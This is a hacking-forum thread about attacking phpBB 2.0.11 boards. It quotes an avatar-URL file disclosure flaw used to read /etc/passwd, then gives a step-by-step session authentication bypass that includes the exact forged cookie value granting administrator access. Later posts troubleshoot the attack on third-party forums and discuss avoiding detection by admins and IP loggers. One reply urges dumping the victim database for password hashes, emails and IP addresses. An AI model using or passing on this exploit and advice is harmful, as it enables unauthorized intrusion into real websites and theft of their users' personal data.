Waraxe Forums - 2.0.11 Arbitrary File Disclosure Vulnerability

kingspice · Beginner

"An attacker can exploit this input validation condition by selecting an avatar from the local machine that meets the board guidelines and can then fill the "Upload Avatar from a URL:" field with the path to an arbitrary file (ex: /etc/passwd). When the avatar is submitted, the destination image of the submitted avatar will contain the contents of the requested file."

Have tried this exploit, however what files can i download that will provide information to me that is useful?
Can download /etc/passwd, however need /etc/shadow to get passwords which the server doesn't allow access to.

Also, are there any better exploits for version 2.0.11?

Kingspice

y3dips · Valuable expert

u could use Session Handling Authentication Bypass,
read about this in this forum too ..

shai-tan · Valuable expert

Yeah just use the 2.0.12 exploit. That ll work for 2.0.11:

phpBB 2.0.12 Session Handling Authentication Bypass ..

easy to use exploit ..

** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..

1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:

3- Close the Browser ..

2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example Wink

and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
where 127.0.0.1 is the domain for the forum << tested on localhost
and a%3A0%3A%7B%7D is the cookie data ..<< as a visitor

3- ok..let's do it !! ..
now open cookies.txt with your text editor
and replace
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
---------------------------------------------------------------------------------------------------------------//
with
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
---------------------------------------------------------------------------------------------------------------//

save the cookies.txt..

4- Open your Browser..and go to the exploited forum ..
>>enjoy Hi Permission mode !! Very Happy

complete the mission by clicking " Go to Administration Panel "

--------------------------------------------------------------------------------

written by : Ali7
e-mail : ali7@hotmail.co.uk

cas · Beginner

I can't get this exploit working on a 2.0.11 forum ;(

This is my cookies.txt before editing:

devn00b · Regular user

They could have manually patched the forums. Its a simple fix realy. My forums still show as .8 but are updated with all the current fixes.

cas · Beginner

any way to find the real version number?

if anyone wants to give it a try, here's the url:

[removed]

shai-tan · Valuable expert

Sorry:P but the rules 1 and 1a clearly say:

Michael_Brad · Regular user

Hey,

I've been searching for resources of "hacking phpBB" for a loooong time. Good to know that I finally found the method...indeed it is simple. Smile

Right, I want to thank you guys for the help on that, however.....if you could help me a little bit over here I would appreciate it!

Right so I have tried editing my cookies and saving them at a few phpBB message boards...but none of them worked. I eventually found out that the reason as to why it would not work, is because my cookies weren't "edited" properly. When I would "replace the text" and went <File < Save the "changes" would not be saved.

Yeah I know, you probably just figured I know nothing about computers...lol. Well I do know a fair bit, but this one I don't know. So if anyone could help me a bit here as to how "save" the changes I have made to my cookies...would be greatly appreciated. Smile

PS Sorry I had to bring this topic back from the dead...

y3dips · Valuable expert

see the permission of the file , are you have some rights to write the file ?
or make ur self someone has right such as administrator in windows or root in *nix

Michael_Brad · Regular user

Bleh just ignore me Embarassed

I figured it all out now...AND made it work! Very Happy

Question btw...if I simply have a look at the admin panel, but I do NOT make any changes, then I will not be caught. Is that correct? Cheers

shai-tan · Valuable expert

This really depends on how many admins there are and what addons they have on the board. Because if they are in the admin panel at the same time and see one of the other admins logged on under a different to usual IP then...... if they have a 3rd party admin or IP logger addon then they may catch you that way. Other wise I would just back up their database and get more md5s and email addys and IPs and websites and anything else. Also veiw whats in the admin forum for the hell of it.

Michael_Brad · Regular user

Cheers for the info...Yeah will not be using this when an admin is already browsing the boards. Now all I need to do is wait for the exploit on 2.0.18 version/phpBB to be released. Twisted Evil

Someone told me btw that he was able to hack a phpBB forum, even if it was patched. Makes me wonder how that is possible - but cheers for the responses anyhow. Wink

Musaaf · Beginner